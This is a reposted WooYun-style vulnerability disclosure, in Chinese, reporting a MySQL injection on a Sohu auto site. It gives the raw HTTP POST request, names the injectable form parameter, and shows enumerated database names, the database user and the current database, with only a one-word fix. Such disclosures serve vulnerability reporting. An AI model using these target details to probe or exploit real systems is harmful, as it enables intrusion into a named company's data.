神刀安全网

漏洞标题: 搜狐某站MySQL注射(附验证脚本)

漏洞详情

披露状态:

2016-04-30: 细节已通知厂商并且等待厂商处理中
2016-04-30: 厂商已经确认,细节仅向厂商公开
2016-05-10: 细节向核心白帽子及相关领域专家公开
2016-05-20: 细节向普通白帽子公开
2016-05-30: 细节向实习白帽子公开
2016-06-14: 细节向公众公开

简要描述:

搜狐某站MySQL注射

详细说明:

拿自己写的神器扫扫试试

code 区域
POST /baike_upload/handleForm.sip HTTP/1.1
Host: db.auto.sohu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://db.auto.sohu.com/baike_upload/baike_update.sip?id=31
Cookie: xxxx
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 2130

carPic=&b-name=%CD%A8%B7%E7%D7%F9%D2%CE&feeling=%09%26%23160%3B%A1%BE%CB%D1%BA%FC%C6%FB%B3%B5%A1%A1%C3%FB%B4%CA%BD%E2%CA%CD%A1%BF%CD%A8%B7%E7%D7%F9%D2%CE%A3%BA%D2%BB%D6%D6%C6%FB%B3%B5%BF%D5%B5%F7%CD%A8%B7%E7%D7%F9%D2%CE%A3%AC%CB%FC%B0%FC%C0%A8%D3%D0%D2%CE%D7%F9%BA%CD%BF%BF%B1%B3%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%C9%CF%B1%ED%C3%E6%D2%CE%CC%D7%CF%C2%B5%C4%D2%CE%D7%F9%C4%DA%C9%E8%D6%C3%D3%D0%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%A3%AC%D4%DA%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CF%C2%B2%BF%B5%C4%D7%F9%D2%CE%C4%DA%C9%E8%D6%C3%D3%D0%CF%F2%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CA%E4%CB%CD%BF%D5%B5%F7%B7%E7%B5%C4%D2%FD%B7%E7%BB%FA%A3%BB%D4%DA%BF%BF%B1%B3%B5%C4%C7%B0%B1%ED%C3%E6%BF%BF%B1%B3%CC%D7%BA%F3%B2%BF%B5%C4%BF%BF%B1%B3%C4%DA%C9%E8%D6%C3%D3%D0%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%A3%AC%D4%DA%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%BA%F3%B2%BF%B5%C4%BF%BF%B1%B3%C4%DA%C9%E8%D6%C3%D3%D0%CF%F2%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CA%E4%CB%CD%BF%D5%B5%F7%B7%E7%B5%C4%D2%FD%B7%E7%BB%FA%A1%A3%CE%AA%C1%CB%CA%B9%D3%C3%B7%BD%B1%E3%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%B2%E0%B1%DA%C9%CF%C9%E8%D6%C3%D3%D0%BF%D8%D6%C6%D2%FD%B7%E7%BB%FA%B9%A4%D7%F7%D7%B4%CC%AC%B5%C4%CE%A2%B5%F7%BF%AA%B9%D8%A1%A3%CE%AA%C1%CB%CC%E1%B8%DF%CD%A8%B7%E7%D0%A7%B9%FB%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%C9%CF%B5%C4%D2%CE%CC%D7%B1%ED%C3%E6%C9%E8%D3%D0%D0%A1%B3%F6%C6%F8%BF%D7%A3%BB%D4%DA%BF%BF%B1%B3%B5%C4%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%B5%C4%BF%BF%B1%B3%CC%D7%B1%ED%C3%E6%C9%E8%D3%D0%D0%A1%B3%F6%C6%F8%BF%D7%A1%A3%B1%BE%CA%B5%D3%C3%D0%C2%D0%CD%B5%C4%D3%D0%D2%E6%D0%A7%B9%FB%CA%C7%A3%BA%BD%E1%B9%B9%BC%F2%B5%A5%A1%A2%CA%B9%D3%C3%B7%BD%B1%E3%A1%A2%B0%B2%D7%B0%BC%BC%CA%F5%BC%F2%B5%A5%A3%AC%C7%D2%B2%BB%C6%C6%BB%B5%C6%FB%B3%B5%D2%CE%D7%D3%BD%E1%B9%B9%D3%EB%CD%E2%B9%DB%A3%AC%C4%DC%B4%EF%B5%BD%BD%DA%C4%DC%BB%B7%B1%A3%CE%C0%C9%FA%B5%C4%B9%A6%C4%DC%A1%A3%0D%0A%0D%0A%09%0D%0A%09%09%0D%0A%09%09%09%0D%0A%09%09%09%09%0D%0A%09%09%0D%0A%09%09%0D%0A%09%09%09%0D%0A%09%09%09%09%26%23160%3B%0D%0A%09%09%0D%0A%09%0D%0A%0D%0A%0D%0A%0D%0A%09%26%23160%3B%0D%0A

code 区域
注入参数#b-name

漏洞证明:

code 区域
available databases [7]:
[*] auto_bmw
[*] auto_search
[*] auto_warehouse
[*] information_schema
[*] sohu_priceinfo
[*] tmp
[*] usedcar

code 区域
当前数据库用户:'[email protected]%'

code 区域
当前数据库:'auto_warehouse'

修复方案:

过滤

版权声明:转载请注明来源 Aasron@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 搜狐某站MySQL注射(附验证脚本)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址